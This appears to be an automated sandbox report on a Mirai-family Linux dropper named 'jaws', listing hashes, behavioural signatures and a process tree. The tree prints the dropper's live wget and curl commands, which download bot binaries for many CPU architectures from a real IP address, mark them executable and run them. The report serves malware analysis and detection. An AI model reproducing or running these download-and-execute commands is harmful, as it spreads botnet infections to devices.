Analysis
max time kernel
149s
max time network
151s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags
arch:mipsel
image:debian9-mipsel-20240729-en
kernel:4.9.0-13-4kc-malta
locale:en-us
os:debian-9-mipsel
system
submitted
30-08-2024 05:17
Static task
static1
Behavioral task
behavioral1
Sample
jaws
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
jaws
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
jaws
Resource
debian9-mipsbe-20240611-en
General
Target
jaws
Size
3KB
MD5
4429a8d8a1c145c7f2135f7b93910618
SHA1
f4a829f7fe5f475e1fc63661218303e41779de65
SHA256
5f146a25218b14546812329e55b5d4b8b0e4b1caf182e4681295efa2d461b0cf
SHA512
5c486e279036afbf60f6c1737141f9613f748bc8b2f6f493b10b7e69556f6df4cb2fe8c2f20846bba5ac46337bc08109cb9f0e81db7ff267a2aed2242c0affc5
Malware Config
Extracted
mirai
UNSTABLE
Signatures
- Contacts a large (142458) amount of remote hosts 1 TTPs
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows 1 TTPs
  This may indicate a network scan to discover remotely running services.
- Executes dropped EXE 13 IoCs
  ioc           pid  Process
  /tmp/hiroz3x  732  hiroz3x
  /tmp/hiroz3x  740  hiroz3x
  /tmp/hiroz3x  746  hiroz3x
  /tmp/hiroz3x  767  hiroz3x
  /tmp/hiroz3x  788  hiroz3x
  /tmp/hiroz3x  812  hiroz3x
  /tmp/hiroz3x  820  hiroz3x
  /tmp/hiroz3x  826  hiroz3x
  /tmp/hiroz3x  838  hiroz3x
  /tmp/hiroz3x  854  hiroz3x
  /tmp/hiroz3x  875  hiroz3x
  /tmp/hiroz3x  881  hiroz3x
  /tmp/hiroz3x  886  hiroz3x
- Modifies Watchdog functionality 1 TTPs 2 IoCs
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                   ioc                 Process
  File opened for modification  /dev/watchdog       hiroz3x
  File opened for modification  /dev/misc/watchdog  hiroz3x
- resource                         yara_rule
  behavioral4/files/fstream-1.dat  upx
  behavioral4/files/fstream-4.dat  upx
  behavioral4/files/fstream-5.dat  upx
  behavioral4/files/fstream-6.dat  upx
  behavioral4/files/fstream-7.dat  upx
- Writes file to system bin folder 1 TTPs 2 IoCs
  description                   ioc             Process
  File opened for modification  /sbin/watchdog  hiroz3x
  File opened for modification  /bin/watchdog   hiroz3x
- Changes its process name 1 IoCs
  description                                                      ioc  pid  Process
  Changes the process name, possibly in an attempt to hide itself  a    746  hiroz3x
- Reads runtime system information 49 IoCs
  Reads data from /proc virtual filesystem.
  description              ioc                            Process
  File opened for reading  /proc/706/cmdline              hiroz3x
  File opened for reading  /proc/804/cmdline              hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/709/cmdline              hiroz3x
  File opened for reading  /proc/863/cmdline              hiroz3x
  File opened for reading  /proc/665/cmdline              hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/exe                 hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/752/cmdline              hiroz3x
  File opened for reading  /proc/843/cmdline              hiroz3x
  File opened for reading  /proc/817/cmdline              hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/860/cmdline              hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/700/cmdline              hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/679/cmdline              hiroz3x
  File opened for reading  /proc/661/cmdline              hiroz3x
  File opened for reading  /proc/695/cmdline              hiroz3x
  File opened for reading  /proc/751/cmdline              hiroz3x
  File opened for reading  /proc/796/cmdline              hiroz3x
  File opened for reading  /proc/798/cmdline              hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/658/cmdline              hiroz3x
  File opened for reading  /proc/823/cmdline              hiroz3x
  File opened for reading  /proc/815/cmdline              hiroz3x
  File opened for reading  /proc/801/cmdline              hiroz3x
  File opened for reading  /proc/856/cmdline              hiroz3x
  File opened for reading  /proc/869/cmdline              hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/702/cmdline              hiroz3x
  File opened for reading  /proc/750/cmdline              hiroz3x
  File opened for reading  /proc/694/cmdline              hiroz3x
  File opened for reading  /proc/820/cmdline              hiroz3x
  File opened for reading  /proc/844/cmdline              hiroz3x
  File opened for reading  /proc/778/cmdline              hiroz3x
  File opened for reading  /proc/784/cmdline              hiroz3x
  File opened for reading  /proc/810/cmdline              hiroz3x
  File opened for reading  /proc/845/cmdline              hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/699/cmdline              hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/829/cmdline              hiroz3x
  File opened for reading  /proc/664/cmdline              hiroz3x
  File opened for reading  /proc/701/cmdline              hiroz3x
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
- Writes file to tmp directory 23 IoCs
  Malware often drops required files in the /tmp directory.
  description                   ioc                  Process
  File opened for modification  /tmp/hiroz3x         jaws
  File opened for modification  /tmp/h0r0zx00x.mpsl  curl
  File opened for modification  /tmp/h0r0zx00x.arm   wget
  File opened for modification  /tmp/h0r0zx00x.arm7  curl
  File opened for modification  /tmp/h0r0zx00x.ppc   wget
  File opened for modification  /tmp/h0r0zx00x.i686  wget
  File opened for modification  /tmp/h0r0zx00x.arc   curl
  File opened for modification  /tmp/h0r0zx00x.spc   curl
  File opened for modification  /tmp/h0r0zx00x.mips  curl
  File opened for modification  /tmp/h0r0zx00x.mpsl  wget
  File opened for modification  /tmp/h0r0zx00x.arm   curl
  File opened for modification  /tmp/h0r0zx00x.arm5  wget
  File opened for modification  /tmp/h0r0zx00x.arm5  curl
  File opened for modification  /tmp/h0r0zx00x.arm7  wget
  File opened for modification  /tmp/h0r0zx00x.ppc   curl
  File opened for modification  /tmp/h0r0zx00x.arm6  wget
  File opened for modification  /tmp/h0r0zx00x.arm6  curl
  File opened for modification  /tmp/h0r0zx00x.m68k  curl
  File opened for modification  /tmp/h0r0zx00x.i686  curl
  File opened for modification  /tmp/h0r0zx00x.x86   wget
  File opened for modification  /tmp/h0r0zx00x.x86   curl
  File opened for modification  /tmp/h0r0zx00x.mips  wget
  File opened for modification  /tmp/h0r0zx00x.sh4   curl
Processes
/tmp/jaws
  /tmp/jaws
  - Writes file to tmp directory
  PID:702

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.x86
    - Writes file to tmp directory
    PID:705

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.x86
    - Reads runtime system information
    - Writes file to tmp directory
    PID:721

  /bin/cat
    cat h0r0zx00x.x86
    PID:730

  /bin/chmod
    chmod +x h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
    PID:731

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:732

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips
    - Writes file to tmp directory
    PID:735

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips
    - Reads runtime system information
    - Writes file to tmp directory
    PID:737

  /bin/cat
    cat h0r0zx00x.mips
    PID:738

  /bin/chmod
    chmod +x h0r0zx00x.mips h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
    PID:739

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:740

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mpsl
    - Writes file to tmp directory
    PID:742

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mpsl
    - Reads runtime system information
    - Writes file to tmp directory
    PID:743

  /bin/cat
    cat h0r0zx00x.mpsl
    PID:744

  /bin/chmod
    chmod +x h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
    PID:745

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Writes file to system bin folder
    - Changes its process name
    - Reads runtime system information
    PID:746

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm
    - Writes file to tmp directory
    PID:748

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm
    - Reads runtime system information
    - Writes file to tmp directory
    PID:757

  /bin/cat
    cat h0r0zx00x.arm
    PID:764

  /bin/chmod
    chmod +x h0r0zx00x.arm h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
    PID:766

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:767

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm5
    - Writes file to tmp directory
    PID:770

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm5
    - Reads runtime system information
    - Writes file to tmp directory
    PID:778

  /bin/cat
    cat h0r0zx00x.arm5
    PID:785

  /bin/chmod
    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
    PID:786

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:788

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm6
    - Writes file to tmp directory
    PID:791

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm6
    - Reads runtime system information
    - Writes file to tmp directory
    PID:798

  /bin/cat
    cat h0r0zx00x.arm6
    PID:809

  /bin/chmod
    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
    PID:811

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:812

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm7
    - Writes file to tmp directory
    PID:815

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm7
    - Reads runtime system information
    - Writes file to tmp directory
    PID:817

  /bin/cat
    cat h0r0zx00x.arm7
    PID:818

  /bin/chmod
    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
    PID:819

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:820

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.ppc
    - Writes file to tmp directory
    PID:822

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.ppc
    - Reads runtime system information
    - Writes file to tmp directory
    PID:823

  /bin/cat
    cat h0r0zx00x.ppc
    PID:824

  /bin/chmod
    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
    PID:825

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:826

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.m68k
    PID:828

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.m68k
    - Reads runtime system information
    - Writes file to tmp directory
    PID:829

  /bin/cat
    cat h0r0zx00x.m68k
    PID:834

  /bin/chmod
    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
    PID:836

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:838

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.spc
    PID:839

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.spc
    - Reads runtime system information
    - Writes file to tmp directory
    PID:844

  /bin/cat
    cat h0r0zx00x.spc
    PID:851

  /bin/chmod
    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
    PID:852

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:854

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.i686
    - Writes file to tmp directory
    PID:856

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.i686
    - Reads runtime system information
    - Writes file to tmp directory
    PID:863

  /bin/cat
    cat h0r0zx00x.i686
    PID:870

  /bin/chmod
    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
    PID:874

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:875

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.sh4
    PID:877

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.sh4
    - Reads runtime system information
    - Writes file to tmp directory
    PID:878

  /bin/cat
    cat h0r0zx00x.sh4
    PID:879

  /bin/chmod
    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.sh4 h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
    PID:880

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:881

  /usr/bin/wget
    wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arc
    PID:882

  /usr/bin/curl
    curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arc
    - Reads runtime system information
    - Writes file to tmp directory
    PID:883

  /bin/cat
    cat h0r0zx00x.arc
    PID:884

  /bin/chmod
    chmod +x h0r0zx00x.arc h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.sh4 h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
    PID:885

  /tmp/hiroz3x
    ./hiroz3x jaws.exploit
    - Executes dropped EXE
    PID:886
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize
30KB
MD5
01b5ca96006efd6ecba70995ac395db5
SHA1
c077939743bbdc1906b9cbd291e9e3c15b2ed613
SHA256
e68a0410f0139792d1c821e2d577323eb034b2a030dfc5d8cc8b6215c2a933ec
SHA512
7cbd89a82ab3ed0ed257cfbbb6a85b27d7a8e7af08c436a5d7104969e23269ad905d8551a1144116b950308daebc90f3515002aadcf65bff754e045714bbec44

Filesize
32KB
MD5
37942437a545b634350c1b0b80d8371f
SHA1
deac7b16e9b9e718cc21de900f8e2e78ec6b41a7
SHA256
805d483543b0940b25147f18257251a4c24ad857c65bb1286f9f794fa1643bbd
SHA512
ba8cbe1e6744b2c6e5136ed739725988410ec0c259cfd89281b0c87c3bc4b3dd3fd15b2541a23953348a5305373f3fdbc02491ebaa6a64a8264d20f19f064fa0

Filesize
33KB
MD5
7e03a4fa6e42aa482775fe8fc656eb29
SHA1
68c1aec948d144ec9a2befedaeea0007b96bf8cf
SHA256
f78f0bd098b133e70ee11e717bcb53430bc23c499942087473044d5dabe2ca01
SHA512
3ba610f23ec82d6c6804e21b2625fa963e7187a9e750a16372154b3bb40743042dab1248c676b638ecc3db4d608bf19193f66a848e69e3a70a2076f084f2d2e2

Filesize
31KB
MD5
4568999226a40c97956934d7f3b623ed
SHA1
58cdfc30ccf6a12dec1dd929cbf3ceecece43d42
SHA256
96abb7f10850173a8c7b4583e49d092a51d53c9bf863aca9162f14a934e7548e
SHA512
77f728e4fa5a8c6fdcbbf6c34ea4987e4c1912da8bfd060d1dc7e639a0415f923984fca3079a87ee792d5e5817bddfeb9be02eda45c9d4c870a4c9de2e6e07c6

Filesize
27KB
MD5
f5129e69c2a10c4ff4ff731d42ee5bed
SHA1
a975cfe7e1e8c66b592d6e33c99a288738243980
SHA256
7128b3640bac18912378cff5bfbead8a0ff169ef0dfd7ad9c16f79aa3d08ae4a
SHA512
3fe57d032eed36553f39b99ca42ba77e30010626e9789a583eab3a417f13fa329a2479b3f2854b518a3a59098887e37f4e184c331539d72046925ad3afdead70

Filesize
54KB
MD5
8b19337d006d6fdc4e59c330efdaf6f9
SHA1
e65b4fe930c51c7b56418cf9f713350524ee0f88
SHA256
f0353e4f5b1447dbe82d3c056cb3701ad53473e4901fe79a7b42f20425f1c080
SHA512
a86486b02b5c7e68dbe2f33364d75e208ede183cbc53ec0161d09444216f2d539305ae24fa58f9af41d2a0bc036da2023836e6db40f13ccc79d6cdf40067f888